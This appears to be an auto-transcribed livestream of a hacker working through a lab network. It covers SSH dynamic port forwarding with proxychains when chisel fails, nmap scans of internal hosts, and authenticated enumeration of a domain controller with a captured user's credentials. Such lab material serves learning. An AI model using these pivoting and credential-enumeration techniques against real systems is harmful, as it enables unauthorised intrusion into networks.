Like I said, I like always just use freaking chisel. So when chisel fails me, I'm lost. But that's the, I mean, even the introduction, it talks about, you know, troubleshooting your tools when they don't work properly. That actually do something? Maybe. I mean, nothing's happening. If we go to HunterBot, let me look at what you're saying. Would that go through proxy chains as well? I think it's called something a little bit different in Kali. Yeah, there we go. Yeah, I think that would work, what you're saying. I'll try this, and if this doesn't work, we're going to do HunterBot's way. Probably much more reliable than what I'm attempting to do here. I'm getting tired, y'all. Okay. I think not getting anything there. Can I try to just like, I think Q is quiet mode. Okay, let's try HunterBot's way. SSH-D. Oh yeah, we'll do 950 since I already did that. Oh, I did that wrong. SSH-D. Then use my IP. Oh, I need to do it from my machine? You guys see how lost I am when Chisel doesn't work? I suppose that makes sense. We're connecting to it. And now can I proxy chain it? Let's try 10.200.113.31. Ignore host discovery. Oh, it's working. Beautiful. So we do actually have the connection. You guys can see it here, but you notice it's going to be a lot slower. So what I'm thinking is we do our initial enumeration through this. So like when we do nmap-p, let's enumerate what's running on these servers real quick. Oh, we need to turn off host discovery. We could, of course, do it through proxy chains, but it's going to be much quicker if we do it from this Ubuntu machine. We already have nmap on it, so let's start enumerating these. But then when we attack them, I'll probably just use my actual host machine. All right, dude. Peace out of you, man. Have a good day, sir. And actually, this is about the end of the stream. Maybe I'll stop it here, and we'll pick up where we left off. Like I said, I'm trying to only go an hour and a half, and honestly, y'all, I'm tired. I don't like trying to hack stuff when I'm tired. But I think we accomplished some decent stuff. We at least got, we privest on, well, we got code execution on the VPN. We got a shell on the VPN. We privest to Ubuntu, which can run every command as sudo. We figured out how to set up port forwarding when Chisel's broken or when Chisel doesn't work properly. I need to just copy down this command right here. That's the one that we did. So if I pull that into Trimental here, and we'll just go to my VPN server. And I might just finish our enumeration though real quick so we don't have to pick up on that. I'm guessing these are the only ports that are going to be open. So we're just going to do nmap-p 445.3389.139.22.135-a for an aggressive scan, and 10.200.113.31-v-pn. And then on this one, nmap-p 10.200.113.32-pn-v for verbose. I'm guessing same ports are going to be open on this one, but we'll let that run a little bit. And so, yeah, before I sign off, guys, let's just get our enumeration done. We'll get everything thrown into our notes so we have a good place to start attacking in the next stream. Yeah, I'm just going to assume these are the only services running on this one as well. Is that about what was on here? Oh, here we have some results back. So let's grab these results. And if we pull up our notes, I think, did I set up stuff for this yet? No. Yeah, here's server 1. Beautiful. So here's server 1, and we'll split some of these things up, make it look a little bit nicer, and get everything saved to our notes so that we're ready to attack. If we go back over here, what ports did I scan here? It's just, I'm guessing it's the same stuff running on the other IP. So let's do that. And while that runs a scan on that IP, just in case there's something different, let's go ahead and start organizing our notes here. So we'll just break out each one of these services into separate tabs. So as we enumerate, it's just a lot easier to follow along, and our notes are nice and organized, and we know a little bit more about what's going on. We'll make this a subpage. You can see how all these collapse now because I organized my notes that way. So you can very quickly look and see, like, hey, what do we have access to? Let's grab SMB here. .135, 139, 445. And then we have RDP, it looks like. Glance back at this. This is still doing its thing. This one's done. And then, of course, we have the DC that we can attack. Is this... Oh, shoot. Did it block me? It's filtered. Is there a firewall that is not happy with how I'm doing that? Let's try... I'm just throwing stuff out now since I'm almost done with screen. If I do proxy chains... Hey, we have creds, though. We can do a enum for Linux with actual creds. How do we authenticate enum for Linux? Do all simple enumeration. Specify username to use. There we go. our user, all of our users have AD access. If we go back to the mail server, SMTP, we can use Laura Wood as usual. Laura Wood -P for password, and we'll grab her password real quick. Like that. And let's see if that works. Shoot, the frick did I do wrong? Oh, maybe I should, you know, give the IP. That might be a good idea. We should be able to dump like a user list and everything now that we can actually hit the domain controller. On this, there's not a whole lot. What tools do I have on here? SMB client's not on there. We could check SMB client. I mean, there's a lot of things we can check, but I think I'm gonna call it a night. Did this find anything? Nope. We found the SID. That's it. All right. Sure if there's anything else I can check real quick. No, I'm tired. We'll dive into this when I have a little more energy. But we at least got a lot of stuff done. I think that's helpful in our hour and a half together. One more time, guys, I will not be live tomorrow night. I'll be leading a meeting in the Work Smarter Discord where we talk about setting goals and just growing professionally and in our careers. So if you want to join that, I'm going to drop the link one more time over in the Twitch chat. Come join the Discord. Would love to meet you. Would love to hang out with you tomorrow night. And we will be back on stream, hopefully, as long as all goes well, on Tuesday evening. And we'll dive right back into this. And we'll begin enumerating these servers. And maybe we'll get the Corp DC. I have no idea. But so far, I've been able to get some progress every stream that we've done, especially thanks to your guys' help on stream. And I've said this from the beginning. We're a team, right? I'm just the guy on the keyboard, but many of you are way smarter than me, so I want your help as we work our way through this. The goal is to learn. I could care less about winning the competition and things like that, but if we learn something that works, and one thing I learned today is when my chisel, my good old reliable chisel doesn't work, we can very easily set up dynamic port forwarding with SSH and then proxy chains and begin attacking the internal network that way. So guys, thank you for hanging out, and I will catch you guys in the next one. See ya.